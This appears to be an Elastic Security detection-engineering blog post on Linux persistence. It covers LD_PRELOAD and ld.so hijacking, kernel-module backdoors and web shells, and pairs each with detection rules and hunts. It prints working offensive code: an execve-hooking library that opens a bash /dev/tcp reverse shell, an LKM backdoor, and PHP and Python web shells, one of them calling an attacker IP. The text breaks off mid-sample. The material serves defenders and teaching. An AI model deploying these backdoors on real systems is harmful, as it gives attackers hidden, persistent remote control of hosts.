Linux Detection Engineering - A Continuation on Persistence Mechanisms

Introduction

Welcome to part three of the Linux Persistence Detection Engineering series! In this article, we continue to dig deep into the world of Linux persistence. Building on foundational concepts and techniques explored in the previous publications, this post discusses some additional, creative and/or complex persistence mechanisms.

If you missed the earlier articles, they lay the groundwork by exploring key persistence concepts. You can catch up on them here:

In this publication, we’ll provide insights into:

How each works (theory)
How to set each up (practice)
How to detect them (SIEM and Endpoint rules)
How to hunt for them (ES|QL and OSQuery reference hunts)

To make the process even more engaging, we will be leveraging PANIX, a custom-built Linux persistence tool designed by Ruben Groenewoud of Elastic Security. PANIX allows you to streamline and experiment with Linux persistence setups, making it easy to identify and test detection opportunities.

By the end of this series, you'll have a robust knowledge of common and rare Linux persistence techniques, and you'll understand how to effectively engineer detections for common and advanced adversary capabilities. Are you ready to continue the journey on Linux persistence mechanisms? Let’s dive in!

Setup note

To ensure you are prepared to detect the persistence mechanisms discussed in this article, it is important to enable and update our pre-built detection rules. If you are working with a custom-built ruleset and do not use all of our pre-built rules, this is a great opportunity to test them and potentially fill any gaps. Now, we are ready to get started.

T1574.006 - Hijack Execution Flow: Dynamic Linker Hijacking

The dynamic linker is a critical component of the Linux operating system responsible for loading and linking shared libraries required by dynamically linked executables. When a program is executed, the dynamic linker resolves references to shared libraries, loading them into memory and linking them to the application at runtime. This allows programs to use external libraries, such as the GNU C Library (glibc), without including the library code within the program itself, which saves memory and simplifies updates.

The following files and paths play a key role in dynamic linking:

Dynamic linker binaries (e.g. ld-linux-x86-64.so.2):
- Typically located in /lib/ or /usr/lib/ for 32-bit systems.
- Found in /lib64/ or /usr/lib64/ on 64-bit systems.
Symbolic links to dynamic linker binaries:
- Typically found in /lib/x86_64-linux-gnu/ or /usr/lib/x86_64-linux-gnu/ for 64-bit systems.
- Typically found in /lib/i386-linux-gnu/ and /usr/lib/i386-linux-gnu/ on 32-bit systems.
Configuration files:
- /etc/ld.so.conf: Specifies additional library paths for the dynamic linker.
- /etc/ld.so.cache: A precompiled cache of library locations generated by ldconfig for efficient resolution.
- /etc/ld.so.preload: Specifies libraries to load before any other libraries.

You can observe the dynamic linker in action using the ldd command, which lists the shared libraries required by an executable and their resolved paths. For example:

> ldd /bin/ls

linux-vdso.so.1 (0x00007fff87480000)
libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007f235ff29000)
/lib64/ld-linux-x86-64.so.2 (0x00007f236034a000)

This output shows the libraries needed by the ls command, along with their locations and the dynamic linker binary responsible for loading them. The dynamic linker itself appears as /lib64/ld-linux-x86-64.so.2 in this case.
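When triaging a host, it can help to split this output into library names and resolved paths so that unexpected locations stand out. The following is a minimal Python sketch and not part of PANIX or our rules; the parse_ldd helper and the sample text are illustrative assumptions, and lines that do not match the expected layout (such as "not found" entries) are simply skipped.

```python
import re

# Matches "name => /path (0xaddr)", "/abs/path (0xaddr)" and "name (0xaddr)" lines.
LDD_LINE = re.compile(
    r"^\s*(?P<name>\S+)(?:\s+=>\s+(?P<path>\S+))?\s+\((?P<addr>0x[0-9a-fA-F]+)\)\s*$"
)


def parse_ldd(output):
    """Return a list of (name, resolved_path) tuples parsed from ldd output."""
    entries = []
    for line in output.splitlines():
        match = LDD_LINE.match(line)
        if not match:
            continue  # blank lines and unexpected layouts are ignored
        name = match.group("name")
        path = match.group("path")
        # Lines without "=>" are either absolute paths or virtual objects (vdso).
        if path is None and name.startswith("/"):
            path = name
        entries.append((name, path))
    return entries


# Sample text copied from the ldd example above.
SAMPLE = """\
linux-vdso.so.1 (0x00007fff87480000)
libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007f235ff29000)
/lib64/ld-linux-x86-64.so.2 (0x00007f236034a000)
"""

for name, path in parse_ldd(SAMPLE):
    print(name, "->", path)
```

A resolved path outside the usual system library directories is a reasonable starting point for a closer look.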

When a dynamically linked program is executed, the process follows these steps:

The dynamic linker loads the binary's ELF (Executable and Linkable Format) header to determine the required libraries.
It searches for the specified libraries in paths defined by:
1. Default system library paths.
2. Custom paths specified in /etc/ld.so.conf or environment variables like LD_PRELOAD and LD_LIBRARY_PATH.
It maps the libraries into the program’s memory space and resolves symbols (e.g., function or variable references) required by the program.
Execution is handed over to the program once all dependencies are resolved.

Dynamic Linker Hijacking occurs when an attacker manipulates the linking process to redirect execution flow. This can involve altering the library search order through LD_PRELOAD, modifying configuration files like /etc/ld.so.conf, or tampering with cached library mappings in /etc/ld.so.cache.

Malware such as HiddenWasp, Symbiote, and open-source rootkits such as Medusa and Azazel leverage this technique to establish persistence. MITRE ATT&CK tracks this technique under the identifier T1574.006.

T1574.006 - Dynamic Linker Hijacking: LD_PRELOAD

The LD_PRELOAD and LD_LIBRARY_PATH environment variables control how shared libraries are loaded by dynamically linked executables. Both are legitimate tools for debugging, profiling, and customizing application behavior, but they are also susceptible to abuse by attackers seeking to hijack the execution flow.

The LD_PRELOAD variable allows users to specify shared libraries that the dynamic linker should load before any others. This preloading ensures that functions or symbols in the specified libraries override those in standard or program-specified libraries. For instance, LD_PRELOAD is often used to test new implementations of library functions without modifying the application itself. For example:

LD_PRELOAD=/tmp/custom_library.so /bin/ls

In this case, the dynamic linker will load custom_library.so before loading any other libraries required by /bin/ls, effectively replacing or augmenting its behavior. Running ldd this time shows a different output:

> ldd /bin/ls

linux-vdso.so.1 (0x00007fff87480000)
libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007f235ff29000)
libcustom.so => /tmp/custom_library.so (0x00007f23ac7e5000)
/lib64/ld-linux-x86-64.so.2 (0x00007f236034a000)

This indicates that the potentially malicious custom_library.so is loaded in addition to the libraries the program itself requires, and that its symbols take precedence.

The LD_LIBRARY_PATH variable specifies directories for the dynamic linker to search when resolving shared libraries. This variable takes precedence over default library paths like /lib/ and /usr/lib/, allowing users to override system libraries with custom versions located in alternate directories:

LD_LIBRARY_PATH=/tmp/custom_libs /bin/ls

Here, the dynamic linker will first search /tmp/custom_libs for the libraries required by /bin/ls. If a library is found there, it will be loaded instead of the default version.

While both LD_PRELOAD and LD_LIBRARY_PATH can hijack the execution flow, they operate differently:

LD_PRELOAD directly specifies libraries to be loaded first, providing precise control over which functions are overridden.
LD_LIBRARY_PATH alters the library search path, potentially affecting multiple libraries and their dependencies.

Environment variables can be set by regular users, making them a useful way to hijack the execution flow without root privileges. However, variables set in a running shell do not persist beyond that session. To make the changes persistent across sessions, attackers can append these variables to shell initialization files such as ~/.bashrc or ~/.zshrc. For example:

> echo 'export LD_PRELOAD=/tmp/malicious_library.so' >> ~/.bashrc
> echo 'export LD_LIBRARY_PATH=/tmp/custom_libs' >> ~/.bashrc

On the next successful login, these variables will automatically be set, ensuring that the specified libraries are loaded whenever a dynamically linked executable is run. For more details, refer to the section on shell profile modification in our previous blog.
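A quick way to review shell initialization files for this pattern is to look for assignments of the two variables. The sketch below is an illustrative assumption rather than one of our hunts: the find_linker_assignments helper is hypothetical, it only handles simple one-line assignments, and it works on text that has already been read from a profile file.

```python
import re

# Assignment of a dynamic linker variable, optionally prefixed by "export".
LINKER_ASSIGNMENT = re.compile(
    r"^\s*(?:export\s+)?(?P<var>LD_PRELOAD|LD_LIBRARY_PATH)=(?P<value>.*)$"
)


def find_linker_assignments(profile_text):
    """Return (line_number, variable, value) for each linker variable assignment."""
    findings = []
    for lineno, line in enumerate(profile_text.splitlines(), start=1):
        if line.lstrip().startswith("#"):
            continue  # commented-out lines are not executed by the shell
        match = LINKER_ASSIGNMENT.match(line)
        if match:
            value = match.group("value").strip().strip("'\"")
            findings.append((lineno, match.group("var"), value))
    return findings


# Sample profile content mirroring the echo commands above.
SAMPLE_PROFILE = """\
# ~/.bashrc
alias ll='ls -l'
export LD_PRELOAD=/tmp/malicious_library.so
export LD_LIBRARY_PATH=/tmp/custom_libs
"""

for finding in find_linker_assignments(SAMPLE_PROFILE):
    print(finding)
```

On a real system the same function could be applied to the contents of each user's ~/.bashrc or ~/.zshrc, as well as system-wide files such as /etc/profile.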

With root access, an attacker can edit the /etc/ld.so.conf file or add configuration fragments to /etc/ld.so.conf.d/ to insert malicious library paths. By running ldconfig, they can ensure these libraries are cached and prioritized in the library search order for all users and applications. For example:

# Create a malicious shared library
> mkdir /lib/malicious
> gcc -shared -o /lib/malicious/libhack.so -fPIC /tmp/hack.c
> cp malicious_libc.so /lib/malicious/libc.so.6

# Add the malicious library path to /etc/ld.so.conf and reload
> echo "/lib/malicious" >> /etc/ld.so.conf
> ldconfig

# Verify with ldd
> ldd /bin/ls

linux-vdso.so.1 (0x00007ffd2b1a5000)
libc.so.6 => /lib/malicious/libc.so.6 (0x00007f23ac7e5000)
/lib64/ld-linux-x86-64.so.2 (0x00007f23ac6e0000)

This output indicates that the malicious libc.so.6 is now being loaded, hijacking the execution flow of /bin/ls and potentially any other application relying on libc.so.6.
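One way to spot an added search path is to compare the directories listed in /etc/ld.so.conf and its fragments against a known-good baseline. The following Python sketch assumes one directory or include directive per line; the parse_ld_so_conf and unexpected_dirs helpers and the baseline set are hypothetical and would need to be adapted to the distribution in question.

```python
def parse_ld_so_conf(text):
    """Split ld.so.conf-style text into (directories, include_patterns)."""
    directories, includes = [], []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()  # drop comments and whitespace
        if not line:
            continue
        tokens = line.split()
        if tokens[0] == "include":
            includes.extend(tokens[1:])  # glob patterns, not expanded here
        else:
            directories.append(line)
    return directories, includes


def unexpected_dirs(text, baseline):
    """Return configured directories that are absent from the baseline set."""
    directories, _ = parse_ld_so_conf(text)
    return [d for d in directories if d.rstrip("/") not in baseline]


# Sample content after the echo command above; the baseline is an assumption.
SAMPLE_CONF = """\
include /etc/ld.so.conf.d/*.conf
/lib/malicious
"""
BASELINE = {"/usr/local/lib"}

print(unexpected_dirs(SAMPLE_CONF, BASELINE))
```

The include patterns are returned separately so that each matching fragment in /etc/ld.so.conf.d/ can be checked the same way.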

Similarly, an attacker can manipulate the /etc/ld.so.preload file to force the dynamic linker to load a malicious shared library into every dynamically linked executable on the system. Unlike modifying the library search paths in /etc/ld.so.conf, this technique directly injects a library into the execution flow, overriding or augmenting critical functions across all applications. For example:

# Create a malicious shared library
> gcc -shared -o /lib/malicious/libhack.so -fPIC hack.c

# Add the malicious library to /etc/ld.so.preload
> echo "/lib/malicious/libhack.so" >> /etc/ld.so.preload

# Verify with ldd
> ldd /bin/ls

linux-vdso.so.1 (0x00007ffd2b1a5000)
libhack.so => /lib/malicious/libhack.so (0x00007f23ac7e5000)
/lib64/ld-linux-x86-64.so.2 (0x00007f236034a000)

The output shows that libhack.so is loaded before any other libraries. Since /etc/ld.so.preload affects all dynamically linked executables, the attack impacts every user and application.
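Because every entry in /etc/ld.so.preload affects all dynamically linked executables, it is worth reviewing each one against an allowlist. The sketch below is an assumption-laden illustration: the helper names are hypothetical, entries are assumed to be separated by whitespace or colons, and the allowlist is empty by default on the assumption that many systems do not use this file at all.

```python
import re


def parse_preload(text):
    """Return the library paths listed in ld.so.preload-style text."""
    entries = []
    for line in text.splitlines():
        line = line.split("#", 1)[0]  # drop comments
        entries.extend(token for token in re.split(r"[\s:]+", line) if token)
    return entries


def unexpected_preloads(text, allowlist=frozenset()):
    """Return preload entries that are not explicitly allowlisted."""
    return [entry for entry in parse_preload(text) if entry not in allowlist]


# Sample content after the echo command above.
SAMPLE_PRELOAD = "/lib/malicious/libhack.so\n"

print(unexpected_preloads(SAMPLE_PRELOAD))
```

Any entry that cannot be tied to a known agent or tool on the host deserves a closer look, regardless of the directory it lives in.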

Additionally, root access allows for more potential attack vectors, such as:

Overwriting legitimate libraries in /lib/, /lib64/, /usr/lib/, or /usr/lib64/ with malicious versions.
Replacing or modifying the dynamic linker binary (e.g. ld-linux-x86-64.so.2) to introduce backdoors or alter the library resolution process.
Modifying system-wide configuration files such as /etc/profile or /etc/bash.bashrc to globally set LD_PRELOAD or LD_LIBRARY_PATH.

Persistence through T1574.006 - Dynamic Linker Hijacking: LD_PRELOAD

Let’s examine how PANIX leverages the dynamic linker hijacking technique within the setup_ld_preload.sh module. This method relies on the presence of various compilation tools on the host system. PANIX hijacks the execution flow of the execve function for a user-specified binary, executing a backgrounded reverse shell whenever the binary is called:

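#define _GNU_SOURCE // Required for RTLD_NEXT
#include <dlfcn.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <unistd.h>

// ATTACKER_IP and ATTACKER_PORT are assumed to be defined elsewhere in the generated source

// Function pointer for the original execve
int (*original_execve)(const char *pathname, char *const argv[], char *const envp[]);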

// Function to spawn a reverse shell in the background
void spawn_reverse_shell() {
	pid_t pid = fork();
	if (pid == 0) { // Child process
		setsid(); // Start a new session
		char command[256];
		sprintf(command, "/bin/bash -c 'bash -i >& /dev/tcp/%s/%d 0>&1'", ATTACKER_IP, ATTACKER_PORT);
		execl("/bin/bash", "bash", "-c", command, NULL);
		exit(0); // Exit child process if execl fails
	}
}

// Hooked execve function
int execve(const char *pathname, char *const argv[], char *const envp[]) {
	// Load the original execve function
	if (!original_execve) {
		original_execve = dlsym(RTLD_NEXT, "execve");
		if (!original_execve) {
			exit(1);
		}
	}

	// Check if the executed binary matches the specified binary
	if (strstr(pathname, "$binary") != NULL) {
		// Spawn reverse shell in the background
		spawn_reverse_shell();
	}

	// Call the original execve function
	return original_execve(pathname, argv, envp);
}

To load the malicious shared object, PANIX backdoors the /etc/ld.so.preload by default.

# Compile the shared object
gcc -shared -fPIC -o $preload_lib $preload_source -ldl
if [ $? -ne 0 ]; then
	echo "Compilation failed. Exiting."
	exit 1
fi

# Add to /etc/ld.so.preload for persistence
if ! grep -q "$preload_lib" "$preload_file" 2>/dev/null; then
	echo $preload_lib >> $preload_file
	echo "[+] Backdoor added to /etc/ld.so.preload for persistence."
else
	echo "[!] Backdoor already present in /etc/ld.so.preload."
fi

Let’s run the module:

> sudo ./panix.sh --ld-preload --ip 192.168.1.1 --port 2016 --binary ls

LD_PRELOAD source code created: /tmp/preload/preload_backdoor.c 
LD_PRELOAD shared object compiled successfully: /lib/preload_backdoor.so 
[+] Backdoor added to /etc/ld.so.preload for persistence. 
[+] Execute the binary ls to trigger the reverse shell.

When opening a session, we can see the malicious library injected into the execution flow:

> ldd $(which ls)                                                                      

linux-vdso.so.1 (0x00007ffe00fe8000)
/lib/preload_backdoor.so (0x00007f610548e000)
libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007f61052bb000)
libdl.so.2 => /lib/x86_64-linux-gnu/libdl.so.2 (0x00007f61052b6000)
/lib64/ld-linux-x86-64.so.2 (0x00007f61054a0000)

Executing the ls command will spawn a reverse connection, while executing any other command, such as whoami, will not. Let’s analyze the logs in Discover:

We can see PANIX being executed, after which the temporary preload_backdoor.c source code is created in the /tmp directory. Next, gcc compiles the source code into a shared object, and the path of that shared object is added to /etc/ld.so.preload. Because this file did not yet exist, it is created. After executing the ls binary, the backdoor is triggered, initializing a reverse connection to the specified IP and port.

To detect different activities along the chain, we have the following detection and endpoint rules in place:

Category	Coverage
File	Dynamic Linker Creation or Modification
	Potential Persistence via File Modification
	Shared Object Created or Changed by Previously Unknown Process
	Modification of Dynamic Linker Preload Shared Object
	Creation of Hidden Shared Object File
	Dynamic Linker (ld.so) Creation
Process	Dynamic Linker Copy
	Shared Object Injection via Process Environment Variable
	Unusual Preload Environment Variable Process Execution
Detection and endpoint rules that cover dynamic linker hijacking persistence

To revert any changes made to the system by PANIX, you can use the corresponding revert module by running:

> sudo ./panix.sh --revert ld-preload 

[+] Reverting ld-preload module...
[+] Removing /lib/preload_backdoor.so from /etc/ld.so.preload...
[+] Removed entry from /etc/ld.so.preload.
[+] Removing malicious shared library /lib/preload_backdoor.so...
[+] Removed /lib/preload_backdoor.so.
[+] Removing temporary directory /tmp/preload...
[+] Removed /tmp/preload.
[!] Note: The backdoor may still be active in your current session.
[!] Please restart your shell session to fully disable the backdoor.
[!] Run 'exec bash' to start a new shell session.                                                                       

> exec bash

Hunting for T1574.006 - Dynamic Linker Hijacking: LD_PRELOAD

Other than relying on detections, it is important to incorporate threat hunting into your workflow. This publication will solely list the available hunts for each persistence mechanism; however, more details regarding the basics of threat hunting are outlined in the “Hunting for T1053 - scheduled task/job” section of “Linux Detection Engineering - A primer on persistence mechanisms”. Additionally, descriptions and references can be found in our Detection Rules repository, specifically in the Linux hunting subdirectory.

We can hunt for this technique using ES|QL and OSQuery by focusing on the misuse of dynamic linker environment variables like LD_PRELOAD and LD_LIBRARY_PATH. The approach includes monitoring for the following:

Processes with suspicious environment variables: Tracks processes with LD_PRELOAD and LD_LIBRARY_PATH set to unusual values.
Creation of shared object (.so) files: Observes .so files created in non-standard or uncommon directories, which could indicate malicious activity.
Modifications to critical dynamic linker files: Monitors changes to files like /etc/ld.so.preload, /etc/ld.so.conf, and associated directories such as /etc/ld.so.conf.d/.

By combining the Persistence via Dynamic Linker Hijacking hunting rule with the tailored detection queries listed above, analysts can effectively identify and respond to T1574.006.
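As a rough local complement to these hunts, the environment of a running process can be checked for the two linker variables. On Linux, /proc/<pid>/environ exposes the initial environment of a process as NUL-separated KEY=VALUE pairs. The sketch below only parses such a byte string; the parse_environ and linker_vars helpers are hypothetical names and are not part of our hunting queries.

```python
LINKER_VARS = ("LD_PRELOAD", "LD_LIBRARY_PATH")


def parse_environ(raw):
    """Decode NUL-separated KEY=VALUE pairs as found in /proc/<pid>/environ."""
    env = {}
    for item in raw.split(b"\0"):
        if b"=" not in item:
            continue  # skip empty trailing items and malformed entries
        key, _, value = item.partition(b"=")
        env[key.decode(errors="replace")] = value.decode(errors="replace")
    return env


def linker_vars(raw):
    """Return only the dynamic linker variables present in the environment."""
    env = parse_environ(raw)
    return {name: env[name] for name in LINKER_VARS if name in env}


# Sample bytes; on a live host these would be read from /proc/<pid>/environ.
SAMPLE_ENVIRON = b"HOME=/root\0LD_PRELOAD=/tmp/custom_library.so\0SHELL=/bin/bash\0"

print(linker_vars(SAMPLE_ENVIRON))
```

Note that this only covers the environment variable route. Libraries injected through /etc/ld.so.preload do not show up in a process environment, so file monitoring remains necessary.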

T1547.006 - Boot or Logon Autostart Execution: Kernel Modules and Extensions

Loadable Kernel Modules (LKMs) provide a way to extend kernel functionality without modifying the core kernel itself. These modules can be dynamically loaded and unloaded at runtime, enabling features like hardware driver support, network protocol handling, and file system management.

Modules are typically stored in the /lib/modules/ or /usr/lib/modules/ directory followed by a subdirectory for the active kernel version and are organized into subdirectories based on their functionality, such as drivers or network protocols. To ensure an LKM is loaded on boot, the following configuration files are read:

/etc/modules
/etc/modprobe.d/
/usr/lib/modprobe.d/
/etc/modules-load.d/
/run/modules-load.d/
/usr/local/lib/modules-load.d/
/usr/lib/modules-load.d/

Management tools like modprobe, insmod, rmmod, and lsmod are used to load, unload, and list modules.
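To review which modules are configured to load at boot, the files in the modules-load.d directories can be parsed line by line. The following Python sketch assumes the common layout of one module name per line, with empty lines and lines starting with # or ; ignored; the configured_modules helper is a hypothetical name, and only the first token of each line is kept.

```python
def configured_modules(text):
    """Return module names listed in modules-load.d-style text."""
    modules = []
    for line in text.splitlines():
        stripped = line.strip()
        if not stripped or stripped[0] in "#;":
            continue  # empty lines and comments are ignored
        modules.append(stripped.split()[0])  # keep the module name only
    return modules


# Sample content; "panix" mirrors the module name used later in this article.
SAMPLE_MODULES_LOAD = """\
# Load at boot
panix

; disabled entry
loop
"""

print(configured_modules(SAMPLE_MODULES_LOAD))
```

Comparing the result against the modules expected for a given host role makes unfamiliar entries easier to notice.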

When an LKM is loaded, the following sequence occurs:

User-space invocation:
a. A user with sufficient privileges initiates the loading process using tools like modprobe or insmod.
Syscall invocation:
a. init_module(): Loads a module from memory.
b. finit_module(): Loads a module from a file descriptor.
Kernel validation:
a. The kernel verifies the module's integrity, structure, and compatibility.
b. Checks include validation of the ELF format and kernel version compatibility using metadata like vermagic.
Dependency Resolution:
a. Tools like depmod generate dependency files that modprobe uses to load any required modules.
Initialization and integration:
a. The module's initialization function is executed, integrating it with the kernel's functionality through exported symbols and interfaces.

Newer systems leverage systemd to invoke module loading during startup based on unit dependencies specified in service files. Older systems may still use scripts in /etc/init.d/ or /etc/rc.d/ to load modules at boot.

The kernel prioritizes modules based on their order in dependency files or init system configurations. The search and load process typically follows:

Default paths specified in /lib/modules/ or /usr/lib/modules/.
Overrides defined in /etc/modprobe.d/ or /usr/lib/modprobe.d/.
Kernel command-line parameters (e.g., modprobe.blacklist).

The flexibility and power of LKMs make them a double-edged sword, as they are not only indispensable for system functionality but also a potential vector for sophisticated threats, such as rootkits. MITRE tracks this technique under T1547.006.

T1014 - Rootkit

Rootkits are a class of malicious software designed to conceal their presence and maintain persistent access to a system. They operate at various levels, from user-space applications to kernel-level modules. Kernel-level rootkits leverage LKMs, manipulating kernel behavior to hide processes, files, and network activity, making them difficult to detect.

While rootkits are a broad and advanced topic, they are closely related to T1547.006 - Kernel Modules and Extensions. By modifying kernel structures or intercepting system calls, these rootkits can gain deep control over the system while remaining hidden from standard detection methods. MITRE tracks Rootkits specifically under T1014.

Future Work: T1014 - Rootkit

Rootkits are a vast topic deserving dedicated attention. In upcoming publications, we will explore:

The basics of rootkits.
Techniques for detecting and hunting rootkits.
Real-world examples of rootkit attacks and defenses.

For now, understanding how LKMs are used as a vector for kernel rootkits bridges the gap between T1547.006 - Kernel Modules and Extensions and the broader topic of rootkits. This blog lays the groundwork for the in-depth exploration of rootkits to come.

Can’t wait to learn more about rootkits? Read our recent research, “Declawing PUMAKIT”, a sophisticated LKM rootkit that employs mechanisms to hide its presence and maintain communication with its C2 servers.

Persistence through T1547.006 - Kernel Modules and Extensions

While T1547.006 and T1014 share some overlap, PANIX includes two distinct modules: one for a basic LKM and another for a fully implemented rootkit. We’ll begin with the simple LKM using the setup_lkm.sh module for T1547.006. As before, this module requires kernel headers and compilation tools to be available on the host.

The LKM being created is a simple module that spawns a separate thread to execute a specified command. Once the command is executed, the thread enters a sleep state for 60 seconds before repeating the process in an infinite while loop.

#include <linux/module.h>
#include <linux/kernel.h>
#include <linux/init.h>
#include <linux/kthread.h>
#include <linux/delay.h>
#include <linux/signal.h>

static struct task_struct *task;

static int backdoor_thread(void *arg) {
	allow_signal(SIGKILL);
	while (!kthread_should_stop()) {
		char *argv[] = {$command};
		call_usermodehelper(argv[0], argv, NULL, UMH_WAIT_PROC);
		ssleep(60);
	}
	return 0;
}

static int __init lkm_backdoor_init(void) {
	printk(KERN_INFO "Loading LKM backdoor module\\n");
	task = kthread_run(backdoor_thread, NULL, "lkm_backdoor_thread");
	return 0;
}

static void __exit lkm_backdoor_exit(void) {
	printk(KERN_INFO "Removing LKM backdoor module\\n");
	if (task) {
		kthread_stop(task);
	}
}

module_init(lkm_backdoor_init);
module_exit(lkm_backdoor_exit);

MODULE_LICENSE("GPL");
MODULE_AUTHOR("PANIX");
MODULE_DESCRIPTION("LKM Backdoor");

After compilation with make and gcc, PANIX copies the LKM to /lib/modules/$(uname -r)/kernel/drivers/${lkm_name}.ko and runs sudo insmod ${lkm_destination} to load the module. The $(uname -r) command substitution ensures that the path corresponding to the active kernel version is resolved.

Let’s run the module:

> sudo ./panix.sh --lkm --default --ip 192.168.1.1 --port 2017

[+] Kernel module source code created: /tmp/lkm/panix.c
[+] Makefile created: /tmp/lkm/Makefile 
[+] Kernel module compiled successfully: /lib/modules/4.19.0-27-amd64/kernel/drivers/panix.ko
[+] Adding kernel module to /etc/modules, /etc/modules-load.d/ and /usr/lib/modules-load.d/...
[+] Kernel module loaded successfully. Check dmesg for the output.
[+] Kernel module added to /etc/modules, /etc/modules-load.d/ and /usr/lib/modules-load.d/
[+] LKM backdoor established!

Taking a look at the remnants left behind in Discover, we can see:

PANIX is executed, initiating the compilation process for the LKM using make, ensuring it is built for the active kernel version. Once compiled, the resulting panix.ko module is placed in the appropriate module library directory for the current kernel. To achieve persistence across reboots, a configuration file named panix.conf is created in both /etc/modules-load.d/ and /usr/lib/modules-load.d/. The module is then loaded into the kernel using the insmod command, activating the reverse shell. Leveraging the Auditd Manager integration, we can observe the kmod utility loading the panix kernel module.

This technique can leave behind several traces. The following detection and endpoint rules are in place to effectively detect these:

Category	Coverage
Driver	Kernel Driver Load
	Kernel Driver Load by non-root User
File	Loadable Kernel Module Configuration File Creation
	Kernel Object File Creation
Process	Kernel Module Load via insmod
	Kernel Module Removal
	Enumeration of Kernel Modules
	Attempt to Clear Kernel Ring Buffer
	Kernel Load or Unload via Kexec Detected
Syslog	Tainted Kernel Module Load
	Tainted Out-Of-Tree Kernel Module Load
Detection and endpoint rules that cover loadable kernel module persistence

For more information on how to set up the Auditd Manager integration to capture driver events and much more, check out the Linux Detection Engineering with Auditd publication.

We can revert this module by executing the following command:

> sudo ./panix.sh --revert lkm

###### [+] Reverting lkm module... #####

[+] Unloading kernel module 'panix'...
[+] Kernel module 'panix' unloaded successfully.
[+] Removing kernel module file '/lib/modules/4.19.0-27-amd64/kernel/drivers/panix.ko'...
[+] Kernel module file '/lib/modules/4.19.0-27-amd64/kernel/drivers/panix.ko' removed successfully.
[+] Removing temporary directory '/tmp/lkm'...
[+] Temporary directory '/tmp/lkm' removed successfully.
[+] Removing panix from /etc/modules, /etc/modules-load.d/ and /usr/lib/modules-load.d/...
[+] Updating module dependencies...
[+] Module dependencies updated.

Hunting for T1547.006 - Kernel Modules and Extensions

We can hunt for this technique using ES|QL and OSQuery, focusing on suspicious kernel module activity, including the creation of .ko files, execution of kernel module management tools, and modifications to kernel module configuration files. The hunting approach includes:

Monitoring kernel module file creation: Tracks .ko file creations in non-standard directories to detect potentially malicious modules.
Identifying unusual module management executions: Monitors processes such as kmod, modprobe, insmod, and rmmod for suspicious or uncommon arguments.
Detecting changes to configuration files: Observes paths like /etc/modprobe.d/, /etc/modules, and related directories for modifications that might enable persistence.
Focusing on rare drivers: Uses queries that identify kernel modules loaded via the init_module or finit_module syscalls that occur infrequently.

By combining the “Persistence via Loadable Kernel Modules” and “Drivers Load with Low Occurrence Frequency” hunting rules with tailored detection queries, analysts can effectively identify T1547.006-related activity.
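On a live host, /proc/modules offers a quick view of loaded modules, and modules that taint the kernel carry a flag group such as (OE) at the end of their line, where O marks an out-of-tree module and E an unsigned one. The sketch below parses text in that layout; the tainted_modules helper is a hypothetical name, and the sample sizes and addresses are made up for illustration.

```python
def tainted_modules(proc_modules_text):
    """Map module name to taint flags for lines that carry a "(FLAGS)" field."""
    findings = {}
    for line in proc_modules_text.splitlines():
        fields = line.split()
        # Expected layout: name size refcount deps state address [(taints)]
        if len(fields) < 7:
            continue  # untainted modules have no seventh field
        flags = fields[6]
        if flags.startswith("(") and flags.endswith(")"):
            findings[fields[0]] = flags[1:-1]
    return findings


# Illustrative sample; values are assumptions, not captured output.
SAMPLE_PROC_MODULES = """\
panix 16384 0 - Live 0xffffffffc0a5d000 (OE)
loop 40960 0 - Live 0xffffffffc0a40000
"""

print(tainted_modules(SAMPLE_PROC_MODULES))
```

Keep in mind that a kernel-level rootkit can hide itself from /proc/modules, so an empty result does not prove that no malicious module is loaded.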

T1505.003 - Server Software Component: Web Shell

A web shell is a malicious script uploaded to a web server, enabling attackers to execute arbitrary commands on the host. They are commonly deployed after exploiting vulnerabilities in server software, weak file upload restrictions, or misconfigurations. Web shells are typically small scripts written in commonly supported languages such as PHP, Python, or Perl. This activity is tracked by MITRE under T1505.003.

T1505.003 - Web Shell - PHP & Python

Web shells often integrate seamlessly with web server configurations like Apache, Nginx, or Lighttpd. These scripts can be categorized into two primary types: command execution (CMD) and reverse shell web shells.

1. Command shells

CMD web shells provide a simple interface to execute system commands through a browser or remote tool. A typical PHP CMD web shell might look like this:

<?php
if (isset($_GET['cmd'])) {
    echo shell_exec($_GET['cmd']);
}
?>

2. Reverse shells

Reverse shell web shells establish an outbound connection from the compromised server to the attacker’s machine. An example PHP reverse shell:

<?php
$ip = '192.168.1.100'; // Attacker IP
$port = 4444;          // Attacker Port
$socket = fsockopen($ip, $port);
exec("/bin/sh -i <&3 >&3 2>&3");
?>

The attacker runs a listener on their machine using Netcat or any other listener. When the shell script is accessed, it connects to the attacker, providing an interactive session.

Leveraging the Common Gateway Interface (CGI) for web shells

The Common Gateway Interface (CGI) allows web servers to execute external scripts and return their output to clients. Attackers can use CGI scripts to execute commands in various languages, including Python, Bash, and Perl. A Python CGI web shell example:

#!/usr/bin/env python3
import cgi
import os

print("Content-type: text/html\n\n")
form = cgi.FieldStorage()
command = form.getvalue("cmd")
if command:
    output = os.popen(command).read()
    print(output)

CGI scripts offer versatility and can be used in environments where PHP or other web shells might be restricted.
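The command shells shown so far share a recognizable shape: request input is passed straight into a command execution function. As a rough illustration of how that shape could be flagged in file content, the Python sketch below uses a few regular expressions. The patterns and the looks_like_cmd_shell helper are assumptions chosen to match the examples in this article; they will miss obfuscated shells and can flag legitimate code, so they are not a replacement for the detection rules discussed later.

```python
import re

# PHP: a command execution function called directly on a request superglobal.
PHP_CMD = re.compile(
    r"\b(?:shell_exec|system|passthru|exec|popen|proc_open)"
    r"\s*\(\s*\$_(?:GET|POST|REQUEST|COOKIE)\b"
)
# Python CGI: form handling combined with a command execution call.
PY_CGI = re.compile(r"cgi\.FieldStorage\(\)")
PY_EXEC = re.compile(r"\b(?:os\.popen|os\.system|subprocess\.\w+)\s*\(")


def looks_like_cmd_shell(source):
    """Return True if the source resembles the simple CMD shells shown above."""
    if PHP_CMD.search(source):
        return True
    return bool(PY_CGI.search(source) and PY_EXEC.search(source))


PHP_SAMPLE = "<?php if (isset($_GET['cmd'])) { echo shell_exec($_GET['cmd']); } ?>"
PY_SAMPLE = (
    "form = cgi.FieldStorage()\n"
    "output = os.popen(form.getvalue('cmd')).read()\n"
)

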